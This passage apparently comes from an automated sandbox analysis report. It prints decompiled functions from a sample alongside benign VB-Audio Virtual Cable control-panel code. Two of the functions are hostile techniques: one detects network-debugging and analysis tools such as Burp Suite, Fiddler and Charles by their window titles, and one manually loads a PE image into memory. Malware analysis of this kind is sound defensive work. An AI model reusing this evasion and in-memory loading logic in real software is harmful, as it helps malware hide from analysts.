											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAD0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019390(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10335dcc = 1;
												return 0;
											}
											_t53 = E10019390(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10335dcc = 1;
											return 0;
										}
										_t55 = E10019390(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10335dcc = 1;
										return 0;
									}
									_t57 = E10019390(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10335dcc = 1;
									return 0;
								}
								__eflags = E1000CAD0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019390(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10335dcc = 1;
								return 0;
							}
							 *0x10335dcc = 1;
							return 0;
						}
						 *0x10335dcc = 1;
						return 0;
					}
					 *0x10335dcc = 1;
					return 0;
				}
				_t66 = E1000CAD0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019390(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10335dcc = 1;
					return 0;
				}
			}

0x10019430
0x10019430
0x10019439
0x1001944e
0x10019456
0x1001946b
0x10019483
0x10019499
0x100194a6
0x100194ab
0x100194ae
0x100194b0
0x10019700
0x00000000
0x10019700
0x100194c2
0x100194c7
0x100194cc
0x1001951b
0x10019520
0x10019523
0x10019525
0x10019549
0x1001954e
0x10019551
0x10019553
0x10019577
0x1001957c
0x1001957f
0x10019581
0x100195a5
0x100195aa
0x100195ad
0x100195af
0x100195f9
0x100195fe
0x10019601
0x10019603
0x10019633
0x1001963a
0x1001963f
0x10019642
0x10019644
0x10019674
0x10019680
0x10019685
0x10019688
0x1001968a
0x00000000
0x00000000
0x10019693
0x10019698
0x1001969b
0x1001969d
0x100196c7
0x100196d6
0x100196d8
0x00000000
0x00000000
0x100196e6
0x100196ee
0x100196f0
0x00000000
0x00000000
0x100196f2
0x00000000
0x100196fc
0x100196ab
0x100196b0
0x100196b3
0x100196b5
0x00000000
0x00000000
0x100196b7
0x00000000
0x100196c1
0x10019652
0x10019657
0x1001965a
0x1001965c
0x00000000
0x00000000
0x1001965e
0x00000000
0x10019668
0x10019611
0x10019616
0x10019619
0x1001961b
0x00000000
0x00000000
0x1001961d
0x00000000
0x10019627
0x100195c0
0x100195c2
0x100195ed
0x00000000
0x100195ed
0x100195d0
0x100195d8
0x100195da
0x00000000
0x00000000
0x100195dc
0x00000000
0x100195e6
0x10019583
0x00000000
0x1001958d
0x10019555
0x00000000
0x1001955f
0x10019527
0x00000000
0x10019531
0x100194d5
0x100194dd
0x100194df
0x00000000
0x100194f9
0x100194f9
0x00000000
0x10019503

APIs

_memset.LIBCMT ref: 1001944E
_memset.LIBCMT ref: 1001946B
GetClassNameA.USER32(?,00000000,00000104), ref: 10019483
GetWindowTextA.USER32 ref: 10019499
_strlen.LIBCMT ref: 100194A6

Part of subcall function 10019390: _strlen.LIBCMT ref: 1001939B
Part of subcall function 10019390: _strlen.LIBCMT ref: 100193A9

_strlen.LIBCMT ref: 100194D5

Strings

Burp Suite, xrefs: 100196DA
Afx:400000:8:10003:0:, xrefs: 100194B6
TCPViewClass, xrefs: 1001950F
HTTP Debugger, xrefs: 100195C4
TStdHttpAnalyzerForm, xrefs: 1001953D
ASExplorer, xrefs: 10019646
SunAwtFrame, xrefs: 10019674
Charles, xrefs: 1001969F
WPE, xrefs: 100194E1
XTPMainFrame, xrefs: 10019599
gdkWindowToplevel, xrefs: 1001956B
Telerik Fiddler, xrefs: 10019605

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen$_memset$ClassNameTextWindow
String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
API String ID: 1565133231-1140939848
Opcode ID: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
Instruction ID: 51e88d16b42fffacdf90acd9036bc3218a7670d11f06c4b4a6332502e68566f8
Opcode Fuzzy Hash: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
Instruction Fuzzy Hash: 7851B6B991430956E710CB71AC89FDA72B8EB20345F440864F91ADD182FBB1F7C8CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402E0E, Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 265windowtimeCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 00402EA5
BeginPaint.USER32(?,?), ref: 00402F76
EndPaint.USER32(?,?), ref: 00402F91
KillTimer.USER32(?,00000000), ref: 00402FC8
PostQuitMessage.USER32(00000000), ref: 00402FE7
DefWindowProcA.USER32(?,?,?,?), ref: 00403138

Strings

VB-Audio Virtual Cable, xrefs: 00402EBD
The VB-Audio Virtual Cable named"%s"is not installed..., xrefs: 00402EC6
VBCABLE not installed, xrefs: 00402EDD
VBCABLE Control Error, xrefs: 00402E9A
VBCABLE Driver version not compatibleVersion 1.0.2.7 or higher required..., xrefs: 00402E9F

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePaint$BeginKillPostProcQuitTimerWindow
String ID: The VB-Audio Virtual Cable named"%s"is not installed...$VB-Audio Virtual Cable$VBCABLE Control Error$VBCABLE Driver version not compatibleVersion 1.0.2.7 or higher required...$VBCABLE not installed
API String ID: 3845133221-3942928297
Opcode ID: 4d63a2bfa6327ec0f3004e0c0bf44bc91a48c0d1608c2a1f2f97a1fbe294faf2
Instruction ID: bb4cc1059bb1b6754256c31f6ab098d666290e2db6be54662162045ecf1f366d
Opcode Fuzzy Hash: 4d63a2bfa6327ec0f3004e0c0bf44bc91a48c0d1608c2a1f2f97a1fbe294faf2
Instruction Fuzzy Hash: 7A711DB26052006FD320DB58EC56FEB3758EBC5314F04443AF688A71C2E7B9A56586EF

Uniqueness

Uniqueness Score: -1.00%

Function 1001B680, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 350
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001B680(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AEA0(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AEA0(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AEE0( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AEE0(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AEA0(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D1F0(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B360(_t239, _t326, _t327, _a4, _a8, _v84, _v76);
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B120(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001ABC0(_v76);
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B4F0(_v76);
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001ADE0(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A9C0(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

0x1001b680
0x1001b680
0x1001b680
0x1001b686
0x1001b68d
0x1001b6ab
0x1001b6b4
0x1001b6b9
0x1001b6be
0x1001b6ca
0x1001b6d8
0x1001b6ef
0x1001b6fd
0x1001b702
0x1001b707
0x1001b716
0x1001b719
0x1001b725
0x1001b746
0x1001b763
0x1001b785
0x1001b78e
0x1001b791
0x1001b7ac
0x1001b7bf
0x1001b7db
0x1001b7c1
0x1001b7ca
0x1001b7ca
0x1001b7e4
0x1001b7e9
0x1001b7e9
0x1001b7a0
0x1001b7a9
0x1001b7a9
0x1001b7f2
0x1001b808
0x1001b813
0x1001b818
0x1001b81e
0x1001b848
0x1001b84b
0x1001b84e
0x1001b855
0x1001b886
0x1001b897
0x1001b89e
0x1001b8ca
0x1001b8dc
0x1001b8e3
0x1001b8ec
0x1001b8f5
0x1001b8fe
0x1001b907
0x1001b910
0x1001b919
0x1001b922
0x1001b930
0x1001b935
0x1001b93a
0x1001b95d
0x1001b96f
0x1001b97d
0x1001b983
0x1001b98d
0x1001b9a0
0x1001b9a5
0x1001b9aa
0x1001b9bc
0x1001b9bf
0x1001b9c2
0x1001b9df
0x1001b9c4
0x1001b9cc
0x1001b9d1
0x1001b9d7
0x1001b9d7
0x1001b9ea
0x1001b9ef
0x1001b9f4
0x1001b9ff
0x1001ba04
0x1001ba09
0x1001ba14
0x1001ba19
0x1001ba1e
0x1001ba2b
0x1001ba87
0x1001ba8e
0x00000000
0x1001ba8e
0x1001ba34
0x1001ba7f
0x1001ba82
0x00000000
0x1001ba82
0x1001ba41
0x1001ba4f
0x1001ba56
0x1001ba68
0x00000000
0x1001ba68
0x1001ba5d
0x1001ba93
0x1001ba97
0x00000000
0x1001ba9f
0x00000000
0x1001ba20
0x00000000
0x1001ba0b
0x00000000
0x1001b9f6
0x00000000
0x1001b9ac
0x00000000
0x1001b93c
0x1001b8af
0x1001b8b7
0x00000000
0x1001b8bd
0x1001b868
0x1001b86b
0x1001b86e
0x1001b875
0x00000000
0x00000000
0x1001b879
0x00000000
0x1001b87f
0x1001b825
0x00000000
0x1001b82b
0x1001b76a
0x00000000
0x1001b770
0x1001b74d
0x00000000
0x1001b753
0x1001b72c
0x00000000
0x1001b732
0x00000000
0x1001b709
0x1001b6df
0x00000000
0x1001b6e5
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B69E
GetProcAddress.KERNEL32(00000000), ref: 1001B6A5

Part of subcall function 1001AEA0: SetLastError.KERNEL32(0000000D,?,1001B6B9,10020924,00000040), ref: 1001AEAD

SetLastError.KERNEL32(000000C1), ref: 1001B6DF

Strings

kernel32.dll, xrefs: 1001B699
GetNativeSystemInfo, xrefs: 1001B694

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast$AddressHandleModuleProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 1762409328-192647395
Opcode ID: ae3fee445ec4d19d6ee5c2b7a83ae7a0f3ff5de58bc9d8d9499198fe1faa7369
Instruction ID: 694ab680ebfe8ef0636185c130ad71dc1cebcbc5687b108a2a2fd76037c7b5c4
Opcode Fuzzy Hash: ae3fee445ec4d19d6ee5c2b7a83ae7a0f3ff5de58bc9d8d9499198fe1faa7369
Instruction Fuzzy Hash: 0AE1F874A00609DFDB04CFA4C884AAEBBB1FF88305F648558E905AF385D774E982CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00403440, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 80
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403440(void* __edx, intOrPtr _a4) {
				char _v128;
				struct tagMSG _v156;
				signed int _t9;
				int _t16;
				int _t23;
				signed int _t25;
				void* _t32;
				void* _t42;

				_t32 = __edx;
				_t9 = CreateMutexA(0, 1, "VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}");
				_t42 = _t9;
				if(_t42 != 0) {
					__eflags = GetLastError() - 0xb7;
					if(__eflags != 0) {
						WaitForSingleObject(_t42, 0xffffffff);
						E00403540(__eflags, 0x4106a8, _a4);
						E004036D0(_t32,  &_v128, "VB-Audio Virtual Cable Control Panel (Version %s)", "1.0.3.5");
						E00403340(_a4, 0x402e40, "MyMainAppMenu",  &_v128);
						_t16 = GetMessageA( &_v156, 0, 0, 0);
						__eflags = _t16;
						if(_t16 != 0) {
							do {
								TranslateMessage( &_v156);
								DispatchMessageA( &_v156);
								_t23 = GetMessageA( &_v156, 0, 0, 0);
								__eflags = _t23;
							} while (_t23 != 0);
						}
						ReleaseMutex(_t42);
						CloseHandle(_t42);
						return _v156.wParam;
					} else {
						_t25 = ReleaseMutex(_t42) | 0xffffffff;
						__eflags = _t25;
						return _t25;
					}
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00403440
0x00403450
0x00403456
0x0040345a
0x0040346f
0x00403474
0x0040348e
0x004034a1
0x004034b5
0x004034ca
0x004034e3
0x004034e5
0x004034e7
0x004034f7
0x004034fc
0x00403503
0x00403510
0x00403512
0x00403512
0x00403517
0x00403519
0x00403520
0x00403532
0x00403476
0x0040347d
0x0040347d
0x00403487
0x00403487
0x0040345c
0x00403466
0x00403466

APIs

CreateMutexA.KERNEL32(00000000,00000001,VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}), ref: 00403450
GetLastError.KERNEL32 ref: 00403469
ReleaseMutex.KERNEL32(00000000), ref: 00403477

Strings

1.0.3.5, xrefs: 004034A6
VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}, xrefs: 00403447
MyMainAppMenu, xrefs: 004034BF
VB-Audio Virtual Cable Control Panel (Version %s), xrefs: 004034AF

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: Mutex$CreateErrorLastRelease
String ID: 1.0.3.5$MyMainAppMenu$VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}$VB-Audio Virtual Cable Control Panel (Version %s)
API String ID: 1553430826-612237310
Opcode ID: 0c2093be51ec6a3dd59bf06eb4acf0b6edaa44eeb9dd057be054cd7b85814052
Instruction ID: d4fbd8c6f311102f4b008c834d8ea839e75bef2df17ef2523c369acf2d79b8a2
Opcode Fuzzy Hash: 0c2093be51ec6a3dd59bf06eb4acf0b6edaa44eeb9dd057be054cd7b85814052
Instruction Fuzzy Hash: 81210731540308BBE220AB74DC45F6B3B5CEB44755F100936BA29B61D1DBB8A50886AE

Uniqueness

Uniqueness Score: -1.00%

Function 00403340, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 70
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403340(struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16) {
				struct _WNDCLASSA _v40;
				struct HWND__* _t21;
				struct HINSTANCE__* _t31;
				struct HWND__* _t32;

				_t31 = _a4;
				_v40.style = 3;
				_v40.lpfnWndProc = _a8;
				_v40.cbClsExtra = 0;
				_v40.cbWndExtra = 0;
				_v40.hInstance = _t31;
				_v40.hIcon = LoadIconA(_t31, 0x64);
				_v40.hCursor = LoadCursorA(0, 0x7f00);
				_v40.hbrBackground = 0xc;
				_v40.lpszMenuName = _a12;
				_v40.lpszClassName = "VBCABLE0ControlPanel0MainWindow0";
				if(RegisterClassA( &_v40) != 0) {
					_t21 = CreateWindowExA(0, "VBCABLE0ControlPanel0MainWindow0", _a16, 0x2cb0000, 0x80000000, 0x80000000, 0x384, 0x12c, 0, 0, _t31, 0);
					_t32 = _t21;
					if(_t32 != 0) {
						ShowWindow(_t32, 5);
						UpdateWindow(_t32);
						return _t32;
					} else {
						MessageBoxA(_t21, "Failed to create window...", "Startup Error", 0x30);
						return 0;
					}
				} else {
					MessageBoxA(0, "Failed to register window class...", "Startup Error", 0x30);
					return 0;
				}
			}

0x00403348
0x0040334f
0x00403357
0x0040335b
0x00403363
0x0040336b
0x0040337c
0x0040338f
0x00403393
0x0040339b
0x0040339f
0x004033b0
0x004033f9
0x004033ff
0x00403403
0x00403422
0x00403429
0x00403435
0x00403405
0x00403412
0x0040341e
0x0040341e
0x004033b2
0x004033c0
0x004033cc
0x004033cc

APIs

LoadIconA.USER32 ref: 0040336F
LoadCursorA.USER32 ref: 00403380
RegisterClassA.USER32 ref: 004033A7
MessageBoxA.USER32 ref: 004033C0
CreateWindowExA.USER32 ref: 004033F9
MessageBoxA.USER32 ref: 00403412

Strings

Failed to create window..., xrefs: 0040340C
Startup Error, xrefs: 004033B4, 00403407
Failed to register window class..., xrefs: 004033B9
VBCABLE0ControlPanel0MainWindow0, xrefs: 0040339F, 004033F2

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadMessage$ClassCreateCursorIconRegisterWindow
String ID: Failed to create window...$Failed to register window class...$Startup Error$VBCABLE0ControlPanel0MainWindow0
API String ID: 2259001068-3365842253
Opcode ID: 0c2879e572fcc9e7f8191eb746f43d3c5421fde4c5571bdbc84616ab7fb244cc
Instruction ID: 6739fdb3db1c511da3919410641a009b659cdbc5ad3c0998b96c8b0e4b081f06
Opcode Fuzzy Hash: 0c2879e572fcc9e7f8191eb746f43d3c5421fde4c5571bdbc84616ab7fb244cc
Instruction Fuzzy Hash: C321A130685310BBE3109F649C59F4B7BE4FF88B45F504529FA84BA2D0D3B896048BCE

Uniqueness

Uniqueness Score: -1.00%

Function 00402CC0, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00402CC0(struct HWND__* _a4, signed int _a8) {
				void* _t9;
				signed int _t20;

				_t20 = _a8 & 0x0000ffff;
				_t9 = _t20 - 0x5a;
				if(_t9 > 0x21) {
					L4:
					if(_t20 < 0x68 || _t20 > 0x6c) {
						__eflags = _t20 - 0x64;
						if(_t20 >= 0x64) {
							__eflags = _t20 - 0x67;
							if(_t20 <= 0x67) {
								_t22 = _t20 + 0xffffff9d << 9;
								__eflags = _t20 + 0xffffff9d << 9;
								E00402C60(_t20 + 0xffffff9d << 9, _t22);
								goto L18;
							}
						}
						return _t9;
					} else {
						E00402C60(_t20 + 0xffffff9b << 0xa, _t20 + 0xffffff9b << 0xa);
						goto L7;
					}
				} else {
					switch( *((intOrPtr*)(0 +  &M00402DEC))) {
						case 0:
							_push(5);
							_push(0);
							_push(0);
							_push("http://www.vb-cable.com");
							_push("open");
							_push( *0x4106a8);
							goto L3;
						case 1:
							__eax =  *0x4106a8;
							_push(5);
							_push(0);
							_push(0);
							_push("http://www.facebook.com/pages/VB-Audio-Software/396002733802606");
							_push("open");
							_push( *0x4106a8);
							goto L3;
						case 2:
							_push(5);
							_push(0);
							_push(0);
							_push("http://www.vb-audio.com");
							_push("open");
							_push( *0x4106a8);
							L3:
							_t9 = ShellExecuteA();
							goto L4;
						case 3:
							_push(0xac44);
							goto L14;
						case 4:
							__eax = E00402C00(__eflags, 0xbb80);
							L7:
							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
							goto L20;
						case 5:
							__eax = E00402C00(__eflags, 0x15888);
							L18:
							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
						case 6:
							_push(0x17700);
							L14:
							__eax = E00402C00(__eflags);
							__esp = __esp + 4;
							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
							goto L20;
						case 7:
							goto L4;
					}
				}
				L20:
			}

0x00402cc5
0x00402ccb
0x00402cd1
0x00402cff
0x00402d02
0x00402db5
0x00402db8
0x00402dba
0x00402dbd
0x00402dc2
0x00402dc2
0x00402dc6
0x00000000
0x00402dc6
0x00402dbd
0x00402de9
0x00402d11
0x00402d18
0x00000000
0x00402d18
0x00402cd3
0x00402cdb
0x00000000
0x00402ce8
0x00402cea
0x00402cec
0x00402cee
0x00402cf3
0x00402cf8
0x00000000
0x00000000
0x00402d3c
0x00402d41
0x00402d43
0x00402d45
0x00402d47
0x00402d4c
0x00402d51
0x00000000
0x00000000
0x00402d5a
0x00402d5c
0x00402d5e
0x00402d60
0x00402d65
0x00402d6a
0x00402cf9
0x00402cf9
0x00000000
0x00000000
0x00402d6d
0x00000000
0x00000000
0x00402d79
0x00402d1d
0x00402d3b
0x00000000
0x00000000
0x00402d85
0x00402dcb
0x00000000
0x00000000
0x00402d8c
0x00402d91
0x00402d91
0x00402d9a
0x00402db4
0x00000000
0x00000000
0x00000000
0x00000000
0x00402cdb
0x00000000

APIs

ShellExecuteA.SHELL32(00000000,open,http://www.vb-cable.com,00000000,00000000,00000005), ref: 00402CF9
MessageBoxA.USER32 ref: 00402D34
MessageBoxA.USER32 ref: 00402DAD
MessageBoxA.USER32 ref: 00402DE2

Strings

open, xrefs: 00402CF3, 00402D4C, 00402D65
http://www.vb-cable.com, xrefs: 00402CEE
http://www.vb-audio.com, xrefs: 00402D60
http://www.facebook.com/pages/VB-Audio-Software/396002733802606, xrefs: 00402D47
The change will take effect on next launch...Please reboot your computer., xrefs: 00402D2E, 00402DA7, 00402DDC
VBCABLE Settings, xrefs: 00402D29, 00402DA2, 00402DD7

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$ExecuteShell
